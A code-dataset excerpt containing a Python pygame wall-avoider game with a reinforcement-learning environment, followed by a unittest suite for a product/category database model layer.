| 40.728155 | 104 | 0.586651 | 1,069 | 8,390 | 4.434986 | 0.213283 | 0.012656 | 0.016452 | 0.018561 | 0.325881 | 0.229066 | 0.166632 | 0.115587 | 0.094917 | 0.07973 | 0 | 0.018687 | 0.266508 | 8,390 | 205 | 105 | 40.926829 | 0.751706 | 0.00882 | 0 | 0.269006 | 0 | 0 | 0.109556 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023392 | false | 0.005848 | 0.070175 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4186a83376db6719d09806172772089d522d0c98 | 12,828 | py | Python | Game-TestHuman.py | brian1985/rl-wall-avoider | c6c5d87f3693bfd27f39a4015f361773bf219cd3 | [
"MIT"
] | null | null | null | Game-TestHuman.py | brian1985/rl-wall-avoider | c6c5d87f3693bfd27f39a4015f361773bf219cd3 | [
"MIT"
] | null | null | null | Game-TestHuman.py | brian1985/rl-wall-avoider | c6c5d87f3693bfd27f39a4015f361773bf219cd3 | [
"MIT"
] | null | null | null | from random import randint, choice
from collections import deque
from time import sleep
import pygame, time
import numpy as np
"""
Code to use arduino as input
import serial
import re
board = serial.Serial("/dev/ttyACM0")
data = board.readline()
data = data.decode()
data = re.sub("[^0-9|]", "", data)
xyz = data.split("|")
x/y default is 512, 0 is left/down, 1024 right/up
z=0/1 with 1 unpressed and 0 pressed
"""
pygame.init()
######################################################################################
class Field:
def __init__(self, height=10, width=5):
self.width = width
self.height = height
self.body = np.zeros(shape=(self.height, self.width))
def update_field(self,walls, player):
try:
# Clear the field:
self.body = np.zeros(shape=(self.height, self.width))
# Put the walls on the field:
for wall in walls:
if not wall.out_of_range :
self.body[wall.y:min(wall.y+wall.height,self.height),:] = wall.body
# Put the player on the field:
self.body[player.y:player.y+player.height,
player.x:player.x+player.width] += player.body
except :
pass
######################################################################################
class Wall:
def __init__(self, height = 5, width=100, hole_width = 20,
y = 0, speed = 1, field = None):
self.height = height
self.width = width
self.hole_width = hole_width
self.y = y
self.speed = speed
self.field = field
self.body_unit = 1
self.body = np.ones(shape = (self.height, self.width))*self.body_unit
self.out_of_range = False
self.create_hole()
def create_hole(self):
hole = np.zeros(shape = (self.height, self.hole_width))
hole_pos = randint(0,self.width-self.hole_width)
self.body[ : , hole_pos:hole_pos+self.hole_width] = 0
def move(self):
self.y += self.speed
self.out_of_range = True if ((self.y + self.height) > self.field.height) else False
######################################################################################
class Player:
def __init__(self, height = 5, max_width = 10 , width=2,
x = 0, y = 0, speed = 2):
self.height = height
self.max_width = max_width
self.width = width
self.x = x
self.y = y
self.speed = speed
self.body_unit = 2
self.body = np.ones(shape = (self.height, self.width))*self.body_unit
self.stamina = 20
self.max_stamina = 20
def move(self, field, direction = 0 ):
'''
Moves the player :
- No change = 0
- left, if direction = 1
- right, if direction = 2
'''
val2dir = {0:0 , 1:-1 , 2:1}
direction = val2dir[direction]
next_x = (self.x + self.speed*direction)
if not (next_x + self.width > field.width or next_x < 0):
self.x += self.speed*direction
self.stamina -= 1
def change_width(self, action = 0):
'''
Change the player's width:
- No change = 0
- narrow by one unit = 3
- widen by one unit = 4
'''
val2act = {0:0 , 3:-1 , 4:1}
action = val2act[action]
new_width = self.width+action
player_end = self.x + new_width
if new_width <= self.max_width and new_width > 0 and player_end <= self.max_width:
self.width = new_width
self.body = np.ones(shape = (self.height, self.width))*self.body_unit
######################################################################################
class Environment:
    """Gym-style environment for a wall-dodging game.

    A Player moves horizontally (and can change its width) inside a Field
    while Walls with holes move through it.  step()/reset() return the
    field body as a numpy array normalized to [0, 1] by MAX_VAL.

    NOTE(review): indentation of this file was reconstructed; confirm the
    drawing part of render() is intentionally outside the ``if human:``
    branch (it is needed for non-human rendering as well).
    """

    P_HEIGHT = 2            # Height of the player
    F_HEIGHT = 20           # Height of the field
    W_HEIGHT = 2            # Height of the walls
    WIDTH = 10              # Width of the field and the walls
    MIN_H_WIDTH = 2         # Minimum width of the holes
    MAX_H_WIDTH = 6         # Maximum width of the holes
    MIN_P_WIDTH = 2         # Minimum Width of the player
    MAX_P_WIDTH = 6         # Maximum Width of the player
    HEIGHT_MUL = 30         # Height Multiplier (used to draw np.array as blocks in pygame)
    WIDTH_MUL = 40          # Width Multiplier (used to draw np.array as blocks in pygame)
    WINDOW_HEIGHT = (F_HEIGHT+1) * HEIGHT_MUL   # Height of the pygame window
    WINDOW_WIDTH = (WIDTH) * WIDTH_MUL          # Width of the pygame window
    ENVIRONMENT_SHAPE = (F_HEIGHT,WIDTH,1)      # Observation shape offered to agents
    # 0: no-op, 1/2: move (see Player.move), 3: narrow, 4: widen
    ACTION_SPACE = [0,1,2,3,4]
    ACTION_SPACE_SIZE = len(ACTION_SPACE)
    PUNISHMENT = -100       # Punishment increment (applied on losing)
    REWARD = 10             # Reward increment (per wall passed)
    score = 0               # Initial Score
    MOVE_WALL_EVERY = 4     # Every how many frames the wall moves.
    MOVE_PLAYER_EVERY = 1   # Every how many frames the player moves.
    frames_counter = 0

    def __init__(self):
        # Colors (RGB tuples):
        self.BLACK = (25,25,25)
        self.WHITE = (255,255,255)
        self.RED = (255, 80, 80)
        self.BLUE = (80, 80, 255)
        self.field = self.walls = self.player = None
        # reset() creates field/walls/player and sets self.MAX_VAL, which the
        # color map below relies on — keep this ordering.
        self.current_state = self.reset()
        # Maps a cell value in field.body to the color it is drawn with;
        # MAX_VAL (player + wall overlap) is drawn red.
        self.val2color = {0:self.WHITE, self.walls[0].body_unit:self.BLACK,
                          self.player.body_unit:self.BLACK, self.MAX_VAL:self.RED}

    def reset(self):
        """Start a new episode and return the initial normalized observation."""
        self.score = 0
        self.frames_counter = 0
        self.game_over = False
        self.field = Field(height=self.F_HEIGHT, width=self.WIDTH )
        w1 = Wall( height = self.W_HEIGHT, width=self.WIDTH,
                   hole_width = randint(self.MIN_H_WIDTH,self.MAX_H_WIDTH),
                   field = self.field)
        self.walls = deque([w1])
        p_width = randint(self.MIN_P_WIDTH,self.MAX_P_WIDTH)
        # Random initial x keeps the whole player inside the field.
        self.player = Player( height = self.P_HEIGHT, max_width = self.WIDTH,
                              width = p_width,
                              x = randint(0,self.field.width-p_width),
                              y = int(self.field.height*0.7), speed = 1)
        # Cell value produced when player and wall overlap; used both for
        # collision detection and to normalize observations into [0, 1].
        self.MAX_VAL = self.player.body_unit + w1.body_unit
        # Update the field :
        self.field.update_field(self.walls, self.player)
        observation = self.field.body/self.MAX_VAL
        return observation

    def print_text(self, WINDOW = None, text_cords = (0,0), center = False,
                   text = "", color = (0,0,0), size = 32):
        """Render `text` onto WINDOW at `text_cords` (centered if `center`)."""
        pygame.init()
        font = pygame.font.Font('freesansbold.ttf', size)
        text_to_print = font.render(text, True, color)
        textRect = text_to_print.get_rect()
        if center:
            textRect.center = text_cords
        else:
            textRect.x = text_cords[0]
            textRect.y = text_cords[1]
        WINDOW.blit(text_to_print, textRect)

    def step(self, action):
        """Advance one frame; returns (normalized observation, reward, game_over).

        Relies on the module-level flag ``score_increased`` (shared with the
        driver script) so the pass-a-wall reward is granted once per wall.
        """
        global score_increased
        self.frames_counter += 1
        reward = 0
        # If the performed action is (move) then player.move method is called:
        if action in [1,2]:
            self.player.move(direction = action, field = self.field)
        # If the performed action is (change_width) then player.change_width method is called:
        if action in [3,4]:
            self.player.change_width(action = action)
        # Move the wall one step (one step every MOVE_WALL_EVERY frames):
        if self.frames_counter % self.MOVE_WALL_EVERY == 0:
            # move the wall one step
            self.walls[-1].move()
            # reset the frames counter
            self.frames_counter = 0
        # Update the field :
        self.field.update_field(self.walls, self.player)
        # If the player passed a wall successfully increase the reward
        if ((self.walls[-1].y) == (self.player.y + self.player.height)) and not score_increased :
            reward += self.REWARD
            self.score += self.REWARD
            # Increase player's stamina every time it passed a wall successfully
            self.player.stamina = min(self.player.max_stamina, self.player.stamina+10)
            # score_increased : a flag to make sure that reward increases once per wall
            score_increased = True
        # Lose Conditions :
        # C1 : The player hits a wall (overlap cell == MAX_VAL)
        # C2 : Player's width was far thinner than hole's width
        # C3 : Player fully consumed its stamina (energy)
        lose_conds = [self.MAX_VAL in self.field.body,
                      ((self.player.y == self.walls[-1].y) and (self.player.width < (self.walls[-1].hole_width-1))),
                      self.player.stamina <=0]
        # If one lose condition or more happened, the game ends:
        if True in lose_conds:
            self.game_over = True
            reward = self.PUNISHMENT
            return self.field.body/self.MAX_VAL, reward, self.game_over
        # Check if a wall moved out of the scene:
        if self.walls[-1].out_of_range:
            # Replace it with a freshly generated wall
            self.walls[-1] = Wall( height = self.W_HEIGHT, width = self.WIDTH,
                                   hole_width = randint(self.MIN_H_WIDTH,self.MAX_H_WIDTH),
                                   field = self.field)
            # Re-arm the once-per-wall reward flag for the new wall.
            score_increased = False
        # Return New Observation , reward, game_over(bool)
        return self.field.body/self.MAX_VAL, reward, self.game_over

    def render(self, WINDOW = None, human=False):
        """Draw the field onto WINDOW; with human=True, also read the keyboard
        and advance the game one step with the chosen action."""
        if human:
            ################ Check Actions #####################
            action = 0
            events = pygame.event.get()
            for event in events:
                if event.type == pygame.QUIT:
                    self.game_over = True
                if event.type == pygame.KEYDOWN:
                    if event.key == pygame.K_LEFT:
                        action = 1
                    if event.key == pygame.K_RIGHT:
                        action = 2
                    if event.key == pygame.K_UP:
                        action = 4
                    if event.key == pygame.K_DOWN:
                        action = 3
            ################## Step ############################
            _,reward, self.game_over = self.step(action)
        ################ Draw Environment ###################
        WINDOW.fill(self.WHITE)
        self.field.update_field(self.walls, self.player)
        # Draw each grid cell as a rectangle, colored by its value.
        for r in range(self.field.body.shape[0]):
            for c in range(self.field.body.shape[1]):
                pygame.draw.rect(WINDOW,
                                 self.val2color[self.field.body[r][c]],
                                 (c*self.WIDTH_MUL, r*self.HEIGHT_MUL, self.WIDTH_MUL, self.HEIGHT_MUL))
        # Score (top, centered) and remaining stamina (bottom-left).
        self.print_text(WINDOW = WINDOW, text_cords = (self.WINDOW_WIDTH // 2, int(self.WINDOW_HEIGHT*0.1)),
                        text = str(self.score), color = self.RED, center = True)
        self.print_text(WINDOW = WINDOW, text_cords = (0, int(self.WINDOW_HEIGHT*0.9)),
                        text = str(self.player.stamina), color = self.RED)
        pygame.display.update()
######################################################################################
# Driver script: run the game interactively until the player wins or quits.
# Make an environment object
env = Environment()
# Change wall speed to 3 (one step every 3 frames)
env.MOVE_WALL_EVERY = 3
# Initialize some variables
WINDOW = pygame.display.set_mode((env.WINDOW_WIDTH, env.WINDOW_HEIGHT))
clock = pygame.time.Clock()
win = False
winning_score = 100
# Repeat the game until the player wins (gets a score of winning_score) or quits the game.
while not win:
    # Shared with Environment.step (via `global`): guarantees the reward is
    # granted only once per wall.
    score_increased = False
    game_over = False
    _ = env.reset()
    pygame.display.set_caption("Game")
    while not game_over:
        clock.tick(27)  # cap the frame rate
        env.render(WINDOW = WINDOW, human=True)
        game_over = env.game_over
    #####################################################
    # Episode finished: show the result screen.
    sleep(0.5)
    WINDOW.fill(env.WHITE)
    if env.score >= winning_score:
        win = True
        env.print_text(WINDOW = WINDOW, text_cords = (env.WINDOW_WIDTH // 2, env.WINDOW_HEIGHT// 2),
                       text = f"You Win - Score : {env.score}", color = env.RED, center = True)
    else:
        env.print_text(WINDOW = WINDOW, text_cords = (env.WINDOW_WIDTH // 2, env.WINDOW_HEIGHT// 2),
                       text = f"Game Over - Score : {env.score}", color = env.RED, center = True)
    pygame.display.update()
| 41.514563 | 116 | 0.528687 | 1,590 | 12,828 | 4.138994 | 0.159748 | 0.032822 | 0.014891 | 0.017323 | 0.26774 | 0.198146 | 0.16183 | 0.144203 | 0.127944 | 0.116092 | 0 | 0.022829 | 0.323901 | 12,828 | 308 | 117 | 41.649351 | 0.735962 | 0.145385 | 0 | 0.17757 | 0 | 0 | 0.008123 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060748 | false | 0.004673 | 0.023364 | 0 | 0.214953 | 0.037383 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4186fcc1ce90afaf587b5f5bd0c8099ee8a70d32 | 26,536 | py | Python | backend/models_test.py | OmarThinks/PIM-API | b7259dd64b397844b26d5e190df5a8701be0ff85 | [
"MIT"
] | null | null | null | backend/models_test.py | OmarThinks/PIM-API | b7259dd64b397844b26d5e190df5a8701be0ff85 | [
"MIT"
] | null | null | null | backend/models_test.py | OmarThinks/PIM-API | b7259dd64b397844b26d5e190df5a8701be0ff85 | [
"MIT"
] | null | null | null | import json
import unittest
from models import (NotReceived, validate_key,
MyModel, Product,Category,ProductCategory,
populate_tables, db_drop_and_create_all,get_dict,)
#from app import create_app
from __init__ import session
# Disable the loader's test-name sorting hook.
# NOTE(review): assumes the unittest version in use accepts None here
# (i.e. skips sorting); confirm — the tests below still rely on
# alphabetical execution order per the class comments.
unittest.TestLoader.sortTestMethodsUsing = None
class modelsTestCase(unittest.TestCase):
    """Tests for the models module: validate_key, get_dict and the
    MyModel-based Product / Category / ProductCategory models.

    NOTE: the tests are order-dependent (they are named so that unittest's
    alphabetical ordering runs them in sequence) and share database state
    across methods; several tests depend on db_drop_and_create_all() /
    populate_tables() calls made by earlier tests.
    """

    def setUp(self):
        # All app/db bootstrapping is disabled here; individual tests call
        # db_drop_and_create_all() / populate_tables() themselves.
        #db_drop_and_create_all()
        #create_app()
        # create and configure the app
        #self.app = create_app(testing=True) #Flask(__name__)
        #self.client = self.app.test_client
        #db.app = self.app
        #db.init_app(self.app)
        #db.create_all()
        pass

    def tearDown(self):
        """Executed after each test"""
        print("_+++++++++++++++++++++++++++++++++_")

    #Note: Tests are run alphabetically
    def test_001_test(self):
        # Sanity check that the test runner works at all.
        self.assertEqual(1,1)
        print("Test 1:Hello, Tests!")

    def test_002_test(self):
        # Start the run from a fresh, empty schema.
        db_drop_and_create_all()
        print("Test 2:db_drop_and_create_all")

    def test_0a_1_1_1_validate_key(self):
        # Default mode: "id", dangerous keys ("password") and NotReceived
        # values are all rejected.
        the_dict = {"id":41,"password":"abc","username":"tryu","bool1":True,
                    "bool2":False,
                    "nr":NotReceived()}
        validated = []
        for key in the_dict:
            validated.append(validate_key(the_dict,key))
        self.assertEqual([False,False,True,True,True,False],validated)
        print("Test 0a_1_1_1 : validate_key: success")

    def test_0a_1_1_2_validate_key(self):
        # id=True makes the "id" key acceptable.
        the_dict = {"id":41,"password":"abc","username":"tryu","bool1":True,
                    "bool2":False,
                    "nr":NotReceived()}
        validated = []
        for key in the_dict:
            validated.append(validate_key(the_dict,key,id=True))
        self.assertEqual([True,False,True,True,True,False],validated)
        print("Test 0a_1_1_2 : validate_key: success")

    def test_0a_1_1_3_validate_key(self):
        # dangerous=True makes the "password" key acceptable.
        the_dict = {"id":41,"password":"abc","username":"tryu","bool1":True,
                    "bool2":False,
                    "nr":NotReceived()}
        validated = []
        for key in the_dict:
            validated.append(validate_key(the_dict,key,dangerous = True))
        self.assertEqual([False,True,True,True,True,False],validated)
        print("Test 0a_1_1_3 : validate_key: success")

    def test_0a_1_1_4_validate_key(self):
        # Same as 0a_1_1_3 (kept for sequence continuity).
        the_dict = {"id":41,"password":"abc","username":"tryu","bool1":True,
                    "bool2":False,
                    "nr":NotReceived()}
        validated = []
        for key in the_dict:
            validated.append(validate_key(the_dict,key,dangerous = True))
        self.assertEqual([False,True,True,True,True,False],validated)
        print("Test 0a_1_1_4 : validate_key: success")

    def test_0a_1_1_5_validate_key(self):
        # Mixed-case "iD" is still rejected; an unsupported value type
        # (plain dict) is rejected even with unsupported=True.
        the_dict = {"iD":41,"password":"abc","username":"tryu","bool1":True,
                    "bool2":False,
                    "nr":NotReceived(), "unsupported":{}}
        validated = []
        for key in the_dict:
            validated.append(validate_key(the_dict,key,dangerous = True,
                                          unsupported=True))
        #print(validated)
        self.assertEqual([False,True,True,True,True,False,False],validated)
        print("Test 0a_1_1_5 : validate_key: success")

    def test_0a_1_1_6_validate_key(self):
        # With unsupported=True a model instance (Product) passes while a
        # plain dict still does not.
        product = Product(name="Cheese",price=50.4,
                          quantity=7.89, code=789456611)
        #print(type(type(product)))
        the_dict = {"ID":41,"password":"abc","username":"tryu","bool1":True,
                    "bool2":False,
                    "nr":NotReceived(), "unsupported1":{}, "unsupported2":product}
        validated = []
        for key in the_dict:
            validated.append(validate_key(the_dict,key,dangerous = True,
                                          unsupported=True))
        #print(validated)
        self.assertEqual([False,True,True,True,True,False,False,True],validated)
        print("Test 0a_1_1_6 : validate_key: success")

    def test_0a_1_1_7_validate_key(self):
        # unsupported=False rejects both the plain dict and the Product.
        product = Product(name="Cheese",price=50.4,
                          quantity=7.89, code=789456611)
        the_dict = {"Id":41,"paSSword":"abc","username":"tryu",
                    "bool1":True,"bool2":False,
                    "nr":NotReceived(), "unsupported1":{}, "unsupported2":product}
        validated = []
        for key in the_dict:
            validated.append(validate_key(the_dict,key, unsupported=False))
        self.assertEqual([False,False,True,True,True,False,False,False],validated)
        print("Test 0a_1_1_7 : validate_key: success")

    def test_0a_1_1_8_validate_key(self):
        # validate_key also works on object attributes, not only dicts.
        product = Product(name="Cheese",price=50.4,
                          quantity=7.89, code=789456611)
        class tst(object):
            def __init__(self):
                self.Id = 41
                self.paSSword = "abc"
                self.username = "tryu"
                self.bool1 = True
                self.bool2 = False
                self.nr = NotReceived()
                self.unsupported1 = {}
                self.unsupported2 = product
        validation_obj = tst()
        validated = []
        for key in ["Id","paSSword","username","bool1","bool2","nr","unsupported1",
                    "unsupported2"]:
            validated.append(validate_key(validation_obj,key, unsupported=False))
        self.assertEqual([False,False,True,True,True,False,False,False],validated)
        print("Test 0a_1_1_8 : validate_key: with object")

    def test_0a_1_2_1_get_dict(self):
        # get_dict on an object keeps only the validated attributes; the
        # id/dangerous flags widen the result accordingly.
        product = Product(name="Cheese",price=50.4,
                          quantity=7.89, code=789456611)
        class tst(object):
            def __init__(self):
                self.Id = 41
                self.paSSword = "abc"
                self.username = "tryu"
                self.bool1 = True
                self.bool2 = False
                self.nr = NotReceived()
                self.unsupported1 = {}
                self.unsupported2 = product
        validation_obj = tst()
        the_dict = get_dict(validation_obj)
        self.assertEqual(the_dict,{"username":"tryu","bool1":True,"bool2":False})
        the_dict = get_dict(validation_obj, id=True,dangerous=True)
        self.assertEqual(the_dict,{"username":"tryu","bool1":True,"bool2":False,
                                   "paSSword":"abc","Id":41})
        print("Test 0a_1_2_1 : get_dict: with object")

    def test_0a_1_2_2_get_dict(self):
        # The id is only available after insert() assigns it.
        product = Product(name="Cheese",price=50.4,
                          quantity=7.89, code=789456611)
        the_dict = get_dict(product, id=True,dangerous=True)
        product.insert()
        the_dict = get_dict(product, id=True,dangerous=True)
        self.assertEqual(the_dict,{"name":"Cheese",
                                   "price":50.4,"id":1,"quantity":7.89,"code":789456611})
        product.delete()
        print("Test 0a_1_2_2 : get_dict: with object")

    def test_0a_1_2_3_get_dict(self):
        # get_dict on a plain dict behaves the same as on an object.
        product = Product(name="Cheese",price=50.4,
                          quantity=7.89, code=789456611)
        the_dict = {"Id":41,"paSSword":"abc","username":"tryu","bool1":True,
                    "bool2":False,
                    "nr":NotReceived(),"unsupported1":{},"unsupported2":product}
        validated = get_dict(the_dict, id=True,dangerous=True)
        self.assertEqual(validated,{"username":"tryu","bool1":True,"bool2":False,
                                    "paSSword":"abc","Id":41})
        validated = get_dict(the_dict)
        self.assertEqual(validated,{"username":"tryu","bool1":True,"bool2":False})
        print("Test 0a_1_2_3 : get_dict: with dict")

    def test_0a_1_2_1_MyModel(self):
        # Constructor keyword arguments land on the instance attributes.
        product = Product(name="Cheese",price=50.4,
                          quantity=7.89, code=789456611)
        self.assertEqual(product.name,"Cheese")
        self.assertEqual(product.price,50.4)
        self.assertEqual(product.quantity,7.89)
        self.assertEqual(product.code,789456611)
        print("Test 0a_1_2_1 : MyModel: success")

    def test_0a_1_2_2_MyModel(self):
        # Unknown constructor keywords raise a TypeError with this message.
        try:
            product = Product(name="Cheese",price=50.4,
                              quantity=7.89, code=789456611, bla="123")
        except Exception as e:
            self.assertEqual(str(e),"'bla' is an invalid "+
                             "keyword argument for Product")
        print("Test 0a_1_2_2 : MyModel: success")

    def test_0a_1_2_3_MyModel(self):
        # simple() reflects the id assigned by insert().
        product = Product(name="Cheese",price=50.4,
                          quantity=7.89, code=789456611)
        self.assertEqual(product.simple(),{"id":None,"name":"Cheese",
                                           "price":50.4, "quantity":7.89, "code":789456611})
        product.insert()
        self.assertEqual(product.simple(),{"name":"Cheese",
                                           "price":50.4, "quantity":7.89, "code":789456611, "id":1})
        #prod = Product(name="789",price=123,seller_id=1)
        #self.assertEqual(prod.simple(),{"name":"789","price":123,
        #    "seller_id":1,"id":None,"in_stock":None,"seller":None})
        #prod.insert()
        #self.assertEqual(prod.simple(),{"name":"789","price":123,
        #    "seller_id":1,"id":1,"in_stock":True})
        #prod.delete()
        product.delete()
        print("Test 0a_1_2_3 : MyModel: success")

    def test_0a_1_2_4_MyModel(self):
        #Trying to add the product with id, and seeing how the id will be neglected
        product = Product(name="Cheese",price=50.4,
                          quantity=7.89, id=10000000,code=789456611)
        self.assertEqual(product.simple(),{"id":None,"name":"Cheese",
                                           "price":50.4, "quantity":7.89, "code":789456611})
        print("Test 0a_1_2_4 : MyModel: success")

    def test_0a_1_3_1_MyModel(self):
        db_drop_and_create_all()
        # Creating the product
        product_to_del = Product(name="Cheese",price=50.4,
                                 quantity=7.89, id=10000000,code=789456611)
        product_to_del.insert()
        #self.assertEqual(len(session.query(Product).all()),1)
        self.assertEqual(len(Product.query().all()),1)
        # The triple-quoted strings below are disabled legacy assertions kept
        # for reference (they target models not present in this project).
        """prod_to_del1 = Product(name = "abc",price=456,seller_id=user_to_del.id)
        prod_to_del2 = Product(name = "abcdef",price=4567,seller_id=user_to_del.id)
        db.session.add_all([prod_to_del1,prod_to_del2])
        db.session.commit()
        self.assertEqual(len(Product.query.all()),2)
        order_to_del1 = Order(
        user_id = user_to_del.id,product_id=prod_to_del1.id,amount=1)
        order_to_del2 = Order(
        user_id = user_to_del.id,product_id=prod_to_del2.id,amount=3)
        order_to_del3 = Order(
        user_id = user_to_del.id,product_id=prod_to_del2.id,amount=5)
        db.session.add_all([order_to_del1,order_to_del2,order_to_del3])
        db.session.commit()
        self.assertEqual(len(Order.query.all()),3)"""
        #img_to_delete1=Image(seller_id=1,name="abc",formatting = "png")
        #img_to_delete2=Image(seller_id=1,name="abce",formatting = "jpg")
        #db.session.add_all([img_to_delete1,img_to_delete2])
        #db.session.commit()
        #self.assertEqual(len(Image.query.all()),2)
        # Trying to delete
        #img_to_delete2.delete()
        #self.assertEqual(len(Image.query.all()),1)
        """order_to_del3.delete()
        self.assertEqual(len(Order.query.all()),2)
        prod_to_del2.delete()
        self.assertEqual(len(Order.query.all()),1)
        self.assertEqual(len(Product.query.all()),1)"""
        product_to_del.delete()
        #self.assertEqual(len(Image.query.all()),0)
        """self.assertEqual(len(Order.query.all()),0)
        self.assertEqual(len(Product.query.all()),0)
        self.assertEqual(len(Product.query.all()),0)"""
        print("Test 0a_1_3_1 : MyModel: relationships")

    def test_0a_1_4_1_MyModel(self):
        # Testing update: update() changes fields but never the primary key.
        # Creating the product
        product_to_del = Product(name="Cheese",price=50.4,
                                 quantity=7.89, id=10000000,code=789456611)
        product_to_del.insert()
        product_dict = get_dict(product_to_del,id=True,dangerous=True)
        self.assertEqual(product_dict,{"id":1,"name":"Cheese",
                                       "price":50.4, "quantity":7.89,"code":789456611})
        product_to_del.update(id=14,name="QUU",price=90,
                              quantity=7000,code=0)
        product_dict = get_dict(product_to_del,id=True,dangerous=True)
        # id stays 1 even though update() was asked to set it to 14.
        self.assertEqual(product_dict,{"id":1,"name":"QUU",
                                       "price":90, "quantity":7000,"code":0})
        product_to_del.delete()
        print("Test 0a_1_4_1 : MyModel: update")

    def test_0a_1_5_1_MyModel_deep(self):
        # deep() includes the (empty) categories relationship.
        # Creating the product
        product_to_del = Product(name="Cheese",price=50.4,
                                 quantity=7.89, id=10000000,code=789456611)
        product_to_del.insert()
        #prod = Product(name="789",price=123,seller_id=1)
        #prod.insert()
        #print(product_to_del.deep())
        self.assertEqual(product_to_del.deep(),
                         {'categories': [], 'code': 789456611, 'id': 1,
                          'name': 'Cheese', 'price': 50.4, 'quantity': 7.89})
        """self.assertEqual(prod.deep(),{'id': 1, 'in_stock': True,
        'name': '789', 'orders': [], 'price': 123.0, 'seller':
        {'id': 1, 'username': 'abc'}, 'seller_id': 1})"""
        print("Test 0a_1_5_1 : MyModel: deep")

    def test_a_1_000_product_intro(self):
        # Banner only: marks the start of the Product test group.
        print("")
        print("")
        print("_+++++++++++++++++++++++++++++++++_")
        print("_+++++++++++++++++++ Models : 1 ) Product ++_")
        print("_+++++++++++++++++++++++++++++++++_")
        print("")
        print("")

    def test_a_1_001_product_insert(self):
        db_drop_and_create_all()
        product1 = Product(name="Cheese",price=50.4,
                           quantity=7.89, id=10000000,code=789456611)
        product1.insert()
        products = Product.query().all()
        self.assertEqual(len(products),1)
        print("Test a_1_1: product insert")

    def test_a_1_002_product_update(self):
        product1 = Product.query().get(1)
        #product1.name = "modified"
        product1.update(name="modified")
        product_1 = Product.query().get(1)
        self.assertEqual(product_1.name,"modified")
        print("Test a_1_2: product update")

    def test_a_1_003_product_delete(self):
        product1 = Product.query().get(1)
        product1.delete()
        products = Product.query().all()
        self.assertEqual(len(products),0)
        print("Test a_1_3: product delete")

    def test_a_1_004_populate(self):
        populate_tables()
        products = Product.query().all()
        self.assertEqual(len(products),5)
        print("Test a_1_4: Populate Tables")

    def test_a_1_005_product_values(self):
        # Depends on the fixture rows created by populate_tables() above.
        product = Product.query().get(1)
        self.assertEqual(product.id,1)
        self.assertEqual(product.name,"Cheese")
        self.assertEqual(product.price,50.4)
        self.assertEqual(product.quantity,7.89)
        self.assertEqual(product.code,789456611)
        #print(product.categories)
        self.assertEqual(json.loads(str(product.categories)),
                         [{"category_id": 1, "id": 1, "product_id": 1},
                          {"category_id": 2, "id": 2, "product_id": 1},
                          {"category_id": 3, "id": 3, "product_id": 1},
                          {"category_id": 4, "id": 4, "product_id": 1},
                          {"category_id": 5, "id": 5, "product_id": 1}])
        """for prod in user.products:
        self.assertEqual(type(prod.id),int)
        self.assertEqual(type(prod.price),float)
        self.assertEqual(type(prod.in_stock),bool)
        self.assertEqual(type(prod.seller_id),int)
        for order in user.orders:
        self.assertEqual(type(order.id),int)
        self.assertEqual(type(order.user_id),int)
        self.assertEqual(type(order.product_id),int)
        self.assertEqual(type(order.amount),int)"""
        """for image in user.images:
        self.assertEqual(type(image.id),int)
        self.assertEqual(type(image.seller_id),int)
        self.assertEqual(type(image.name),str)
        self.assertEqual(type(image.formatting),str)"""
        print("Test a_1_5: product values")

    def test_a_1_006_product_insert_wrong(self):
        products = Product.query().all()
        old_records_number = len(products)
        try:
            #This code will not be executed
            #There are missing required parameters
            product = Product()
            product.insert()
            self.assertEqual(True,False)
        except Exception as e:
            self.assertEqual(str(e),"True != False")
        products = Product.query().all()
        new_records_number = len(products)
        self.assertEqual(old_records_number,
                         new_records_number)
        print("Test a_1_6: product insert with missing"+
              "required parameters")

    def test_a_1_007_product_delete_wrong(self):
        products = Product.query().all()
        old_records_number = len(products)
        try:
            #This code will not be executed
            #There is no product with the number 0
            product1 = Product.query().get(0)
            product1.delete()
            self.assertEqual(True,False)
        except Exception as e:
            self.assertEqual(str(e),"'NoneType' "+
                             "object has no attribute 'delete'")
            #print(str(e))
        products = Product.query().all()
        new_records_number = len(products)
        self.assertEqual(old_records_number,
                         new_records_number)
        print("Test a_1_7: product delete mistake, non-existent"+
              "product id")

    def test_a_1_008_product_simple(self):
        product = Product.query().get(1).simple()
        #print(product)
        self.assertEqual(product,{'code': 789456611,
                                  'id': 1, 'price': 50.4, 'name':
                                  'Cheese', 'quantity': 7.89})
        print("Test a_1_8: product simple")

    def test_a_1_009_product_relationship_order(self):
        # Placeholder: the original relationship assertions are disabled.
        product = Product.query().get(1)
        """orders=user.orders
        orders_ids=[order.id for order in orders]
        self.assertEqual(1 in orders_ids,True)
        self.assertEqual(2 in orders_ids,False)
        self.assertEqual(3 in orders_ids,False)
        self.assertEqual(4 in orders_ids,True)"""
        print("Test a_1_9:product relationship_order")

    def test_a_1_010_product_delete_relationships(self):
        # Deleting a product cascades to its ProductCategory links but not
        # to the categories themselves.
        #measuring lengths before actions
        #populate_tables()
        products_before = len(Product.query().all())
        categories_before = len(Category.query().all())
        pc_before = len(ProductCategory.query().all())
        # deleting the product
        prod_to_del = Product.query().get(1)
        prod_to_del.delete()
        self.assertEqual(len(Product.query().all()),products_before-1)
        self.assertEqual(len(Category.query().all()),categories_before)
        self.assertEqual(len(ProductCategory.query().all()),pc_before-5)
        print("Test a_1_10: product delete relationships")

    def test_a_1_011_product_deep(self):
        #measuring lengths before actions
        product = Product.query().get(4)
        #print(product.deep())
        self.assertEqual(product.deep(),
                         {'categories': [], 'code': 8444441, 'id': 4,
                          'name': 'Mobile', 'price': 20.1, 'quantity': 9.0})
        print("Test a_1_11: product deep")

    def test_a_2_000_category_intro(self):
        # Banner only: marks the start of the Category test group.
        print("")
        print("")
        print("_+++++++++++++++++++++++++++++++++_")
